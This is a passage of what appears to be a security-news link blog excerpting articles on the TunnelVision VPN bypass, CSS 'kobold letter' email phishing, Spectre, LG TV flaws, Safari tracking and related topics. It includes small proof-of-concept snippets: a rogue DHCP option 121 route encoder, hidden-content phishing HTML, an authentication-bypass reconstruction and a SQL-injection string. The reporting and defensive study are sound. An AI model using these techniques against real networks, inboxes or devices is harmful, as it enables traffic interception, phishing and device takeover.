We now have traffic being transmitted outside the VPN’s encrypted tunnel. This technique can also be used against an already established VPN connection once the VPN user’s host needs to renew a lease from our DHCP server. We can artificially create that scenario by setting a short lease time in the DHCP lease, so the user updates their routing table more frequently. In addition, the VPN control channel is still intact because it already uses the physical interface for its communication. In our testing, the VPN always continued to report as connected, and the kill switch was never engaged to drop our VPN connection.
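
For reference, RFC 3442 defines the wire format for option 121: each route is a one-byte prefix length, the significant octets of the destination, then the four-octet router address. The sketch below encodes the pair of /1 routes described above; the gateway address stands in for a hypothetical attacker-controlled DHCP server.

import ipaddress

def encode_route(destination, gateway):
    """Encode one classless static route per RFC 3442."""
    net = ipaddress.ip_network(destination)
    significant = (net.prefixlen + 7) // 8   # only significant destination octets are sent
    dest_octets = net.network_address.packed[:significant]
    return bytes([net.prefixlen]) + dest_octets + ipaddress.ip_address(gateway).packed

attacker_gw = "192.168.1.100"   # hypothetical rogue DHCP server / gateway
option_121 = encode_route("0.0.0.0/1", attacker_gw) + encode_route("128.0.0.0/1", attacker_gw)
print(option_121.hex())
# -> 0100c0a801640180c0a80164: two routes, each as prefix-len, dest octet, router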

The attack can most effectively be carried out by a person who has administrative control over the network the target is connecting to. In that scenario, the attacker configures the DHCP server to use option 121. It’s also possible for people who can connect to the network as an unprivileged user to perform the attack by setting up their own rogue DHCP server.

The attack allows some or all traffic to be routed outside the encrypted tunnel. In either case, the VPN application will report that all data is being sent through the protected connection. Any traffic that’s diverted away from this tunnel will not be encrypted by the VPN, and the Internet IP address viewable by the remote party will belong to the network the VPN user is connected to, rather than one designated by the VPN app.

Interestingly, Android is the only operating system that fully immunizes VPN apps from the attack because it doesn’t implement option 121. For all other OSes, there are no complete fixes. When apps run on Linux there’s a setting that minimizes the effects, but even then TunnelVision can be used to exploit a side channel that can be used to de-anonymize destination traffic and perform targeted denial-of-service attacks. Network firewalls can also be configured to deny inbound and outbound traffic to and from the physical interface. This remedy is problematic for two reasons: (1) a VPN user connecting to an untrusted network has no ability to control the firewall and (2) it opens the same side channel present with the Linux mitigation.

The most effective fixes are to run the VPN inside of a virtual machine whose network adapter isn’t in bridged mode or to connect the VPN to the Internet through the Wi-Fi network of a cellular device. The research, from Leviathan Security researchers Lizzie Moratti and Dani Cronce, is available here.

Source: Novel attack against virtually all VPN apps neuters their entire purpose | Ars Technica

Microsoft’s latest Windows security updates might break your VPN

Microsoft says the April security updates for Windows may break your VPN. (Oops!) “Windows devices might face VPN connection failures after installing the April 2024 security update (KB5036893) or the April 2024 non-security preview update,” the company wrote in a status update. It’s working on a fix.

Bleeping Computer first reported the issue, which affects Windows 11, Windows 10 and Windows Server 2008 and later. User reports on Reddit are mixed, with some commenters saying their VPNs still work after installing the update and others claiming their encrypted connections were indeed borked.

“We are working on a resolution and will provide an update in an upcoming release,” Microsoft wrote.

There’s no proper fix until Microsoft pushes a patched update. However, you can work around the issue by uninstalling all the security updates. In an unfortunate bit of timing for CEO Satya Nadella, he said last week that he wants Microsoft to put “security above all else.” I can’t imagine making customers (temporarily) choose between going without a VPN and losing the latest protection is what he had in mind.

At least one Redditor claims that uninstalling and reinstalling their VPN app fixed the problem for them, so it may be worth trying that before moving on to more drastic measures.

If you decide to uninstall the security updates, Microsoft tells you how. “To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument,” the company wrote in its patch notes. “You can find the package name by using this command: DISM /online /get-packages.”

Source: Microsoft’s latest Windows security updates might break your VPN

UK becomes first country to ban default bad passwords on IoT devices

[…] On Monday, the United Kingdom became the first country in the world to ban default guessable usernames and passwords from these IoT devices. Unique passwords installed by default are still permitted.

The Product Security and Telecommunications Infrastructure Act 2022 (PSTI) introduces new minimum-security standards for manufacturers, and demands that these companies are open with consumers about how long their products will receive security updates for.

Manufacturing and design practices mean many IoT products introduce additional risks to the home and business networks they’re connected to. In one often-cited case described by cybersecurity company Darktrace, hackers were allegedly able to steal data from a casino’s otherwise well-protected computer network after breaking in through an internet-connected temperature sensor in a fish tank.

Under the PSTI, weak or easily guessable default passwords such as “admin” or “12345” are explicitly banned, and manufacturers are also required to publish contact details so users can report bugs.

Products that fail to comply with the rules could face being recalled, and the companies responsible could face a maximum fine of £10 million ($12.53 million) or 4% of their global revenue, whichever is higher.

The law will be regulated by the Office for Product Safety and Standards (OPSS), which is part of the Department for Business and Trade rather than an independent body.

[…]

Similar laws are being advanced elsewhere, although none have entered into effect. The European Union’s Cyber Resilience Act has yet to be finalized, but its similar provisions aren’t expected to apply within the bloc until 2027.

There is no federal law about securing consumer IoT devices in the United States, although the IoT Cybersecurity Improvement Act of 2020 requires the National Institute of Standards and Technology “to develop and publish standards and guidelines for the federal government” on how they use IoT devices.

Source: UK becomes first country to ban default bad passwords on IoT devices

Apple’s ‘incredibly private’ Safari not so private in Europe, allows third-party app stores to track users

Apple’s grudging accommodation of European antitrust rules by allowing third-party app stores on iPhones has left users of its Safari browser exposed to potential web activity tracking.

Developers Talal Haj Bakry and Tommy Mysk looked into the way Apple implemented the installation process for third-party software marketplaces on iOS with Safari, and concluded Cupertino’s approach is particularly shoddy.

“Our testing shows that Apple delivered this feature with catastrophic security and privacy flaws,” wrote Bakry and Mysk in an advisory published over the weekend.

Apple – which advertises Safari as “incredibly private” – evidently has undermined privacy among European Union Safari users through a marketplace-kit: URI scheme that potentially allows approved third-party app stores to follow those users around the web.

[…]

The trouble is, any site can trigger a marketplace-kit: request. On EU iOS 17.4 devices, that will cause a unique per-user identifier to be fired off by Safari to an approved marketplace’s servers, leaking the fact that the user was just visiting that site. This happens even if Safari is in private browsing mode. The marketplace’s servers can reject the request, which can also include a custom payload, passing more info about the user to the alternative store.

[…]

Apple doesn’t allow third-party app stores in most parts of the world, citing purported privacy and security concerns – and presumably interest in sustaining its ability to collect commissions for software sales.

But Apple has been designated as a “gatekeeper” under Europe’s Digital Markets Act (DMA) for iOS, the App Store, Safari, and just recently iPadOS.

That designation means the iBiz has been ordered to open its gated community so that European customers can choose third-party app stores and web-based app distribution – also known as side-loading.

But wait, there’s more

According to Bakry and Mysk, Apple’s URI scheme has three significant failings. First, they say, it fails to check the origin of the website, meaning the aforementioned cross-site tracking is possible.

Second, Apple’s MarketplaceKit – its API for third-party stores – doesn’t validate the JSON Web Tokens (JWT) passed as input parameters via incoming requests. “Worse, it blindly relayed the invalid JWT token when calling the /oauth/token endpoint,” observed Bakry and Mysk. “This opens the door to various injection attacks to target either the MarketplaceKit process or the marketplace back-end.”

And third, Apple isn’t using certificate pinning, which leaves the door open for meddling by an intermediary (MITM) during the MarketplaceKit communication exchange. Bakry and Mysk claim they were able to overwrite the servers involved in this process with their own endpoints.

The limiting factor of this attack is that a marketplace must first be approved by Apple before it can undertake this sort of tracking. At present, not many marketplaces have won approval. We’re aware of the B2B Mobivention App marketplace, AltStore, and Setapp. Epic Games has also planned an iOS store. A few other marketplaces will work after an iThing jailbreak, but they’re unlikely to attract many consumers.

Nope, the costs to set up your own store are prohibitive and you still have to funnel proceeds to Apple – see also Shameless Insult, Malicious Compliance, Junk Fees, Extortion Regime: Industry Reacts To Apple’s Proposed Changes Over Digital Markets Act

“The flaw of exposing users in the EU to tracking is the result of Apple insisting on inserting itself between marketplaces and their users,” asserted Bakry and Mysk. “This is why Apple needs to pass an identifier to the marketplaces so they can identify installs and perhaps better calculate the due Core Technology Fee (CTF).”

They urge iOS users in Europe to use Brave rather than Safari because Brave’s implementation checks the origin of the website against the URL to prevent cross-site tracking.

Back when Apple planned not to support Home Screen web apps in Europe – a gambit later abandoned after developer complaints and regulatory pressure – the iGiant justified its position by arguing the amount of work required “was not practical to undertake given the other demands of the DMA.” By not making the extra effort to implement third-party app stores securely, Apple has arguably turned its security and privacy concerns into a self-fulfilling prophecy.

In its remarks [PDF] on complying with the DMA, Apple declared, “In the EU, every user’s security, privacy, and safety will depend in part on two questions. First, are alternative marketplaces and payment processors capable of protecting users? And, second, are they interested in doing so?”

There’s also the question of whether Apple is capable of protecting users – and whether it’s interested in doing so.

[…]

Source: Apple’s ‘incredibly private’ Safari not so private in Europe • The Register

CSS allows HTML emails to change their content after they have been forwarded

[…] The email your manager received and forwarded to you was something completely innocent, such as a potential customer asking a few questions. All that email was supposed to achieve was being forwarded to you. However, the moment the email appeared in your inbox, it changed. The innocent pretext disappeared and the real phishing email became visible. A phishing email you had to trust because you knew the sender and they even confirmed that they had forwarded it to you.

This attack is possible because most email clients allow CSS to be used to style HTML emails. When an email is forwarded, the position of the original email in the DOM usually changes, allowing for CSS rules to be selectively applied only when an email has been forwarded.

An attacker can use this to include elements in the email that appear or disappear depending on the context in which the email is viewed. Because they are usually invisible, only appear in certain circumstances, and can be used for all sorts of mischief, I’ll refer to these elements as kobold letters, after the elusive sprites of mythology.

This affects all types of email clients and webmailers that support HTML email. So pretty much all of them. For the moment, however, I’ll focus on selected clients to demonstrate the problem, and leave it to others (or future me) to extend the principle to other clients.

[…]

Exploiting this in Thunderbird is fairly straightforward. Thunderbird wraps emails in <div class="moz-text-html" lang="x-unicode"></div> and leaves them otherwise unchanged, making it a good example to demonstrate the principle. When forwarding an email, the quoted email will be enclosed in another <div></div>, moving it down one level in the DOM.

Taking this into account leads to the following proof of concept:

<!DOCTYPE html>
<html>

<head>
    <style>
        .kobold-letter {
            display: none;
        }

        .moz-text-html>div>.kobold-letter {
            display: block !important;
        }
    </style>
</head>

<body>
    <p>This text is always visible.</p>
    <p class="kobold-letter">This text will only appear after forwarding.</p>
</body>

</html>

The email contains two paragraphs, one that has no styling and should always be visible, and one that is hidden with display: none;. This is how it looks when the email is displayed in Thunderbird:

A simple email containing the sentence "This text is always visible."

This email may look harmless…

As expected, only the paragraph “This text is always visible.” is shown. However, when we forward the email, the second paragraph becomes suddenly visible. Albeit only to the new recipient – the original recipient who forwarded the email remains unaware.

The sentence "This text will only appear after forwarding." is now visible.

…until it has been forwarded.

Because we know exactly where each element will be in the DOM relative to .moz-text-html, and because we control the CSS, we can easily hide and show any part of the email, changing the content completely. If we style the kobold letter as an overlay, we can not only affect the forwarded email, but also (for example) replace any comments your manager might have had on the original mail, opening up even more opportunities for phishing.

[…]

Source: Kobold letters – Lutra Security

Intel CPUs still vulnerable to Spectre attack

[…] We’re told mitigations put in place at the software and silicon level by the x86 giant to thwart Spectre-style exploitation of its processors’ speculative execution can be bypassed, allowing malware or rogue users on a vulnerable machine to steal sensitive information – such as passwords and keys – out of kernel memory and other areas of RAM that should be off limits.

The boffins say they have developed a tool called InSpectre Gadget that can find snippets of code, known as gadgets, within an operating system kernel that on vulnerable hardware can be abused to obtain secret data, even on chips that have Spectre protections baked in.

[…]

“We show that our tool can not only uncover new (unconventionally) exploitable gadgets in the Linux kernel, but that those gadgets are sufficient to bypass all deployed Intel mitigations,” the VU Amsterdam team said this week. “As a demonstration, we present the first native Spectre-v2 exploit against the Linux kernel on last-generation Intel CPUs, based on the recent BHI variant and able to leak arbitrary kernel memory at 3.5 kB/sec.”

A quick video demonstrating that Native BHI-based attack to grab the /etc/shadow file of usernames and hashed passwords out of RAM on a 13th-gen Intel Core processor is below. We’re told the technique, tagged CVE-2024-2201, will work on any Intel CPU core.

The VU Amsterdam team — Sander Wiebing, Alvise de Faveri Tron, Herbert Bos and Cristiano Giuffrida — have now open sourced InSpectre Gadget, an angr-based analyzer, plus a database of gadgets found for Linux Kernel 6.6-rc4 on GitHub.

“Our efforts led to the discovery of 1,511 Spectre gadgets and 2,105 so-called ‘dispatch gadgets,'” the academics added. “The latter are very useful for an attacker, as they can be used to chain gadgets and direct speculation towards a Spectre gadget.”

[…]

AMD and Arm cores are not vulnerable to Native BHI, according to the VU Amsterdam team. AMD has since confirmed this in an advisory.

[…]

After the aforementioned steps were taken to shut down BHI-style attacks, “this mitigation left us with a dangling question: ‘Is finding ‘native’ Spectre gadgets for BHI, ie, not implanted through eBPF, feasible?'” the academics asked.

The short answer is yes. A technical paper [PDF] describing Native BHI is due to be presented at the USENIX Security Symposium.

Source: Tool finds new ways to exploit Spectre holes in Intel CPUs • The Register

Critical bugs in LG TVs could allow complete device takeover

A handful of bugs in LG smart TVs running WebOS could allow an attacker to bypass authorization and gain root access on the device.

Once they have gained root, your TV essentially belongs to the intruder who can use that access to do all sorts of nefarious things including moving laterally through your home network, dropping malware, using the device as part of a botnet, spying on you — or at the very least severely screwing up your streaming service algorithms.

Bitdefender Labs researcher Alexandru Lazăr spotted the four vulnerabilities that affect WebOS versions 4 through 7. In an analysis published today, the security firm noted that while the vulnerable service is only intended for LAN access, more than 91,000 devices are exposed to the internet, according to a Shodan scan.

Here’s a look at the four flaws:

  • CVE-2023-6317: a PIN/prompt bypass that allows an attacker to set a variable and add a new user account to the TV without requiring a security PIN. It has a CVSS rating of 7.2.
  • CVE-2023-6318: a critical command injection flaw with a 9.1 CVSS rating that allows an attacker to elevate an initial access to root-level privileges and take over the TV.
  • CVE-2023-6319: another 9.1-rated command injection vulnerability that can be triggered by manipulating the music-lyrics library.
  • CVE-2023-6320: a critical command injection vulnerability that can be triggered by manipulating an API endpoint to allow execution of commands on the device as dbus, which has similar permissions as root. It also received a 9.1 CVSS score.

In order to abuse any of the command injection flaws, however, the attacker must first exploit CVE-2023-6317. This issue is down to WebOS running a service on ports 3000/3001 that allows users to control their TV from their smartphone using a PIN. But there’s a bug in the account handler function that sometimes allows skipping the PIN verification:

The function that handles account registration requests uses a variable called skipPrompt which is set to true when either the client-key or the companion-client-key parameters correspond to an existing profile. It also takes into consideration what permissions are requested when deciding whether to prompt the user for a PIN, as confirmation is not required in some cases.

After creating an account with no permissions, an attacker can then request a new account with elevated privileges, “but we specify the companion-client-key variable to match the key we got when we created the first account,” the team reports.

The server confirms that the key exists, but doesn’t verify which account it belongs to, we’re told. “Thus, the skipPrompt variable will be true and the account will be created without requesting a PIN confirmation on the TV,” the team reports.
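
Bitdefender hasn’t published the vulnerable code, but the logic bug it describes is simple enough to paraphrase. The Python below is a hypothetical reconstruction – field names and structure are illustrative assumptions, not WebOS code – showing why checking that a key merely exists, rather than which account it belongs to, lets the PIN prompt be skipped for a privileged registration.

```python
# Hypothetical reconstruction of the flawed flow described for CVE-2023-6317.
# Names, fields and structure are illustrative, not actual WebOS code.

existing_profiles = {}  # client-key -> granted permissions

def register_account(req):
    key = req.get("companion-client-key") or req.get("client-key")

    # BUG: skipPrompt only checks that the key matches *some* existing
    # profile, never which account it belongs to or what that account
    # is actually allowed to do.
    skip_prompt = key in existing_profiles

    if req["permissions"] and not skip_prompt:
        raise PermissionError("on-screen PIN confirmation required")

    existing_profiles[req["new-client-key"]] = req["permissions"]

# Step 1: an unprivileged account needs no PIN at all.
register_account({"new-client-key": "attacker-low", "permissions": []})

# Step 2: reuse that key as companion-client-key and the PIN check is
# skipped even though elevated permissions are being requested.
register_account({"new-client-key": "attacker-high",
                  "companion-client-key": "attacker-low",
                  "permissions": ["all"]})
```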

And then, after creating this account with elevated privileges, an attacker can use that access to exploit the other three flaws that lead to root access or command execution as the dbus user.

Lazăr responsibly reported the flaws to LG on November 1, 2023, and LG asked for a time extension to fix them. The electronics giant issued patches on March 22. It’s a good idea to check your TV for software updates and apply the WebOS patch now.

Source: Critical bugs in LG TVs could allow complete device takeover

In-app browsers still a privacy, security, and choice issue

[…] Open Web Advocacy (OWA), a group that supports open web standards and fair competition, said in a post on Tuesday that representatives “recently met with both the [EU’s] Digital Markets Act team and the UK’s Market Investigation Reference into Cloud Gaming and Browsers team to discuss how tech giants are subverting users’ choice of default browser via in-app browsers and the harm this causes.”

OWA argues that in-app browsers, without notice or consent, “ignore your choice of default browser and instead automatically and silently replace your default browser with their own in-app browser.”

The group’s goal isn’t to ban the technology, which has legitimate uses. Rather, it’s to prevent in-app browsers from being used to thwart competition and flout user choice.

In-app browsers are like standalone web browsers without the interface – they rely on the native app for the interface. They can be embedded in native platform apps to load and render web content within the app, instead of outside the app in the designated default browser.

[…]

The problem with in-app browsers is that they play by a different set of rules from standalone browsers. As noted by OWA in its 62-page submission [PDF] to regulators:

  • They override the user’s choice of default browser
  • They raise tangible security and privacy harms
  • They stop the user from using their ad-blockers and tracker blockers
  • The privacy and security settings of the user’s default browser are not shared
  • They are typically missing web features
  • They typically have many unique bugs and issues
  • The user’s session state is not shared so they are booted out of websites they have logged into in their default browser
  • They provide little benefit to users
  • They create significant work and often break third-party websites
  • They don’t compete as browsers
  • They confuse users and today function as dark patterns

From around 2016, software engineers involved in web application development began voicing concerns about in-app browsers at some of the companies using them. But it wasn’t until around 2019, when Google engineer Thomas Steiner published a blog post about Facebook’s use of in-app browsers in its iOS and Android apps, that the privacy and choice impact of in-app browsers began to register with a wider audience.

Steiner observed: “WebViews can also be used for effectively conducting intended man-in-the-middle attacks, since the IAB [in-app browser] developer can arbitrarily inject JavaScript code and also intercept network traffic.” He added: “Most of the time, this feature is used for good.”

[…]

In August 2022, developer Felix Krause published a blog post titled “Instagram and Facebook can track anything you do on any website in their in-app browser.” A week later, he expanded his analysis of in-app browsers to note how TikTok’s iOS app injects JavaScript to subscribe to “every keystroke (text inputs) happening on third party websites rendered inside the TikTok app”.

[…]

Even assuming one accepts Meta’s and TikTok’s claims that they’ve not misused the extraordinary access granted by in-app browsers – a difficult ask in light of allegations raised in ongoing Meta litigation – the issue remains that companies implementing in-app browsers may be overriding the choices of users regarding their browser and whatever extensions they have installed.

However, Meta does provide a way to opt out of having its in-app browser open links clicked in its Facebook and Instagram apps.

[…]

As for the Competition and Markets Authority (CMA), the UK watchdog appears to be willing to consider allowing developer choice to supersede user choice, or at least that was the case two years ago. In its 2022 response to the CMA’s Interim Report, Google observed [PDF] that the competition agency itself had conceded that in an Android native app, the choice of browser belongs to the app developer rather than to Google.

“The Interim Report raises concerns about in-app browsers overriding users’ chosen default browsers,” Google said in its response. “However, as the CMA rightly notes, the decision on whether a native app launches an in-app browser, and if so, which browser, lies with the respective app developer, not Google. Having control over whether or not an in-app browser is launched allows app developers to customize their user interfaces, which can in turn improve the experience for users. There is therefore, to some extent, a trade-off between offering developers choice and offering end users choice.”

Source: In-app browsers still a privacy, security, and choice issue • The Register

However, in-app browsers are a horrible security breach and the choice should belong to the user – not Google, not an app developer.

GitHub’s new AI-powered tool auto-fixes vulnerabilities in your code

GitHub introduced a new AI-powered feature capable of speeding up vulnerability fixes while coding. This feature is in public beta and automatically enabled on all private repositories for GitHub Advanced Security (GHAS) customers.

Known as Code Scanning Autofix and powered by GitHub Copilot and CodeQL, it helps deal with over 90% of alert types in JavaScript, TypeScript, Java, and Python.

Once toggled on, it provides suggested fixes that GitHub claims will address more than two-thirds of the vulnerabilities found while coding, with little or no editing required.

“When a vulnerability is discovered in a supported language, fix suggestions will include a natural language explanation of the suggested fix, together with a preview of the code suggestion that the developer can accept, edit, or dismiss,” GitHub’s Pierre Tempel and Eric Tooley said.

The code suggestions and explanations it provides can include changes to the current file, multiple files, and the current project’s dependencies.
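
GitHub hasn’t published its fix templates, so the snippet below is only an illustration of the kind of alert code scanning raises in a supported language and the kind of small, local change an autofix suggestion typically amounts to: here, CodeQL’s Python SQL-injection query and a switch to a parameterized query.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

# The kind of finding code scanning raises (CodeQL query py/sql-injection):
# user-controlled input concatenated straight into a SQL statement.
def find_user_unsafe(username: str):
    cur = conn.execute(f"SELECT * FROM users WHERE name = '{username}'")
    return cur.fetchall()

# The kind of change an autofix suggestion typically proposes: the same
# query, parameterized, with the surrounding logic left untouched.
def find_user_fixed(username: str):
    cur = conn.execute("SELECT * FROM users WHERE name = ?", (username,))
    return cur.fetchall()

print(find_user_fixed("alice"))         # [('alice', 'alice@example.com')]
print(find_user_unsafe("' OR '1'='1"))  # leaks every row - the flagged pattern
```

The point is that the suggestion stays reviewable: the developer still accepts, edits, or dismisses it, which is why the verification caveat below matters.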

Implementing this approach can significantly reduce the frequency of vulnerabilities that security teams must handle daily.

This, in turn, enables them to concentrate on ensuring the organization’s security rather than being forced to allocate unnecessary resources to keep up with new security flaws introduced during the development process.

However, it’s also important to note that developers should always verify whether the security issues are actually resolved, as GitHub’s AI-powered feature may suggest fixes that only partially address a vulnerability or fail to preserve the intended code functionality.

“Code scanning autofix helps organizations slow the growth of this ‘application security debt’ by making it easier for developers to fix vulnerabilities as they code,” added Tempel and Tooley.

“Just as GitHub Copilot relieves developers of tedious and repetitive tasks, code scanning autofix will help development teams reclaim time formerly spent on remediation.”

The company plans to add support for additional languages in the coming months, with C# and Go support coming next.

More details about the GitHub Copilot-powered code scanning autofix tool are available on GitHub’s documentation website.

Last month, the company also enabled push protection by default for all public repositories to stop the accidental exposure of secrets like access tokens and API keys when pushing new code.

This was a significant issue in 2023, as GitHub users accidentally exposed 12.8 million authentication and other sensitive secrets via more than 3 million public repositories throughout the year.

As BleepingComputer reported, exposed secrets and credentials have been exploited in multiple high-impact breaches in recent years.

Source: GitHub’s new AI-powered tool auto-fixes vulnerabilities in your code

Italy’s Piracy Shield Blocks Innocent Web Sites, Makes It Hard For Them To Appeal – so ISPs are ignoring the law because it’s stupid

Italy’s newly installed Piracy Shield system, put in place by the country’s national telecoms regulator, Autorità per le Garanzie nelle Comunicazioni (Authority for Communications Guarantees, AGCOM), is already failing in significant ways. One issue became evident in February, when the VPN provider AirVPN announced that it would no longer accept users resident in Italy because of the “burdensome” requirements of the new system. Shortly afterwards, TorrentFreak published a story about the system crashing under the weight of requests to block just a few hundred IP addresses. Since there are now around two billion copyright claims being made every year against YouTube material, it’s unlikely that Piracy Shield will be able to cope once takedown requests start ramping up, as they surely will.

That’s a future problem, but something that has already been encountered concerns one of the world’s largest and most important content delivery networks (CDN), Cloudflare. CDNs have a key function in the Internet’s ecology. They host and deliver digital material to users around the globe, using their large-scale infrastructure to provide this quickly and efficiently on behalf of Web site owners. Blocking CDN addresses is reckless: it risks affecting thousands or even millions of sites, and compromises some of the basic plumbing of the Internet. And yet according to a post on TorrentFreak, that is precisely what Piracy Shield has now done:

Around 16:13 on Saturday [24 February], an IP address within Cloudflare’s AS13335, which currently accounts for 42,243,794 domains according to IPInfo, was targeted for blocking [by Piracy Shield]. Ownership of IP address 188.114.97.7 can be linked to Cloudflare in a few seconds, and double-checked in a few seconds more.

The service that rightsholders wanted to block was not the IP address’s sole user. There’s a significant chance of that being the case whenever Cloudflare IPs enter the equation; blocking this IP always risked taking out the target plus all other sites using it.
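
It is easy to see for yourself how many unrelated hostnames can sit behind a single CDN address. The sketch below uses placeholder domains and plain DNS resolution; whether any given sample actually lands on a shared Cloudflare IP varies, but whenever it does, an IP-level block hits every name in that bucket.

```python
import socket
from collections import defaultdict

# Placeholder domains: substitute any sites you suspect are fronted by the
# same CDN. Results vary from run to run, which is rather the point.
domains = ["example-a.com", "example-b.org", "example-c.net"]

by_ip = defaultdict(list)
for name in domains:
    try:
        by_ip[socket.gethostbyname(name)].append(name)
    except socket.gaierror:
        pass  # unresolvable placeholder, skip it

for ip, names in by_ip.items():
    if len(names) > 1:
        print(f"{ip} fronts {len(names)} of the sampled sites: {', '.join(names)}")
```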

The TorrentFreak article lists a few of the evidently innocent sites that were indeed blocked by Piracy Shield, and notes:

Around five hours after the blockade was put in place, reports suggest that the order compelling ISPs to block Cloudflare simply vanished from the Piracy Shield system. Details are thin, but there is strong opinion that the deletion may represent a violation of the rules, if not the law.

That lack of transparency about what appears to be a major overblocking incident is part of a larger problem, which affects those who are wrongfully cut off. As TorrentFreak writes, AGCOM’s “rigorous complaint procedure” for Piracy Shield “effectively doesn’t exist”:

information about blocks that should be published to facilitate correction of blunders, is not being published, also in violation of the regulations.

That matters, because appeals against Piracy Shield’s blocks can only be made within five working days of their publication. As a result, the lack of information about erroneous blocks makes it almost impossible for those affected to appeal in time:

That raises the prospect of a blocked innocent third party having to a) proactively discover that their connectivity has been limited b) isolate the problem to Italy c) discover the existence of AGCOM d) learn Italian and e) find the blocking order relating to them.

No wonder, then, that:

some ISPs, having seen the mess, have decided to unblock some IP addresses without permission from those who initiated the mess, thus contravening the rules themselves.

In other words, not only is the Piracy Shield system wrongly blocking innocent sites, and making it hard for them to appeal against such blocks, but its inability to follow the law correctly is causing ISPs to ignore its rulings, rendering the system pointless.

This combination of incompetence and ineffectiveness brings to mind an earlier failed attempt to stop people sharing unauthorized copies. It’s still early days, but there are already indications that Italy’s Piracy Shield could well turn out to be a copyright fiasco on the same level as France’s Hadopi system, discussed in detail in Walled Culture the book (digital versions available free).

Source: Italy’s Piracy Shield Blocks Innocent Web Sites And Makes It Hard For Them To Appeal | Techdirt

Commercial Bank of Ethiopia glitch lets customers withdraw millions

Ethiopia’s biggest commercial bank is scrambling to recoup large sums of money withdrawn by customers after a “systems glitch”.

The customers discovered early on Saturday that they could take out more cash than they had in their accounts at the Commercial Bank of Ethiopia (CBE).

More than $40m (£31m) was withdrawn or transferred to other banks, local media reported.

It took several hours for the institution to freeze transactions.

Much of the money was withdrawn from state-owned CBE by students, bank president Abe Sano told journalists on Monday.

News of the glitch spread across universities largely via messaging apps and phone calls.

Long lines formed at campus ATMs, with a student in western Ethiopia telling BBC Amharic people were withdrawing money until police officers arrived on campus to stop them.

[…]

Ethiopia’s central bank, which serves as the financial sector’s governing body, released a statement on Sunday saying “a glitch” had occurred during “maintenance and inspection activities”.

The statement, however, focused on the interrupted service that occurred after CBE froze all transactions. It did not mention the money withdrawn by customers.

Mr Sano did not say exactly how much money was withdrawn during Saturday’s incident, but said the loss incurred was small when compared to the bank’s total assets.

He stated that CBE was not hit by a cyber-attack and that customers should not be worried as their personal accounts were intact.

At least three universities have released statements advising students to return any money not belonging to them that they may have taken from CBE.

Anyone returning money will not be charged with a criminal offence, Mr Sano said.

But it’s not clear how successful the bank’s attempts to recoup its money have been so far.

The student from Jimma University said on Monday he had not heard of anyone giving the money back, but said he had seen police vehicles on campus.

[…]

Source: Commercial Bank of Ethiopia glitch lets customers withdraw millions

VPN Demand Surges 234.8% After Adult Site Restriction on Texas-Based Users

VPN demand in Texas skyrocketed by 234.8% on March 15, 2024, after state authorities enacted a law requiring adult sites to verify users’ ages before granting them access to the websites’ content.

Texas’ age verification law was passed in June 2023 and was set to take effect in September of the same year. However, a day before its implementation, a US district judge temporarily blocked enforcement in response to a lawsuit from the Free Speech Coalition (FSC), which argued the policy was unconstitutional under the First Amendment.

On March 14, 2024, the US Court of Appeals for the 5th Circuit ruled that Texas could proceed with enforcing the law.

In protest, Pornhub, the most visited adult site in the US, blocked IP addresses from Texas – the eighth state to be cut off after enacting similar restrictions on adult sites.

[…]

Following the law’s enactment, users in Texas seem to be scrambling for means to access the affected adult sites. vpnMentor’s research team analyzed user demand data and found a 234.8% increase in VPN demand in the state.

(The source article includes a graph of VPN demand in Texas from March 1 to March 16.)

Past VPN Demand Surges from Adult Site Restrictions

Pornhub has previously blocked IP addresses from Louisiana, Mississippi, Arkansas, Utah, Virginia, North Carolina, and Montana — all of which have enforced age-verification laws that the adult site deemed unjust.

In May 2023, Pornhub’s banning of Utah-based users caused a 967% spike in VPN demand in the state. That same year, the passing of adult-site-related age restriction laws in Louisiana and Mississippi led to a 200% and 72% surge in VPN interest, respectively.

Source: VPN Demand Surges Post Adult Site Restriction on Texas-Based Users

Under New Management detects when your extensions have changed owners

Under New Management intermittently checks your installed extensions to see if the developer information listed on the Chrome Web Store or Firefox Add-ons store has changed. If anything is different, the extension icon will display a red badge, alerting you to the change.

Screenshot: the warning shown when an extension’s listed developer has changed

Why is this needed?

Extension developers are constantly getting offers to buy their extensions. In nearly every case, the people buying these extensions want to rip off the existing users.

The users of these extensions have no idea an installed extension has changed hands, and may now be compromised.

Under New Management gives users notice of the change of ownership, giving them a chance to make an informed decision about the software they’re using.
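
The extension itself is browser-side JavaScript, but the core idea fits in a few lines. The Python below is an illustrative stand-in, not the project’s code: record the developer name shown on an extension’s store listing and raise a flag when it changes between runs. The scraping regex is a placeholder, since the store’s markup is not a stable API.

```python
import json
import re
import urllib.request
from pathlib import Path

STATE = Path("known_owners.json")  # where previously seen developer names live

def fetch_owner(listing_url: str) -> str | None:
    """Very rough scrape of a store listing page.
    The regex is a placeholder: the store's markup is not a stable API, and
    the real extension reads store metadata from inside the browser."""
    html = urllib.request.urlopen(listing_url).read().decode("utf-8", "replace")
    m = re.search(r"offered by\s*(?:<[^>]*>\s*)*([^<]+)", html, re.IGNORECASE)
    return m.group(1).strip() if m else None

def check(listings: dict[str, str]) -> None:
    known = json.loads(STATE.read_text()) if STATE.exists() else {}
    for name, url in listings.items():
        owner = fetch_owner(url)
        if owner and known.get(name) not in (None, owner):
            print(f"!! {name}: developer changed from {known[name]!r} to {owner!r}")
        if owner:
            known[name] = owner
    STATE.write_text(json.dumps(known, indent=2))

# Example run against one listing URL (taken from the install links below):
check({"Under New Management":
       "https://chromewebstore.google.com/detail/under-new-management/jppepdecgemgbgnjnnfjcmanlleioikj"})
```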

Source: Under New Management (Github)

Install for Chrome: https://chromewebstore.google.com/detail/under-new-management/jppepdecgemgbgnjnnfjcmanlleioikj

Install for Firefox: https://addons.mozilla.org/en-US/firefox/addon/under-new-management-v2/

OR

Download a prebuilt release, unpack the .zip file, and load the dist directory into your browser.

How to Prevent X’s Audio and Video Calls Feature From Revealing Your IP Address – wait, it reveals your IP address :O – wait… of course, it’s a Musk thing

[…] X began rolling out the audio and video calling feature, which was previously restricted to paid users, to everyone last week. However, hawk-eyed sleuths quickly noticed that the feature was automatically turned on, meaning that users had to manually go to their settings to turn it off. Only your mutuals or someone you’ve exchanged DMs with can call you by default, but that’s still potentially a lot of people.

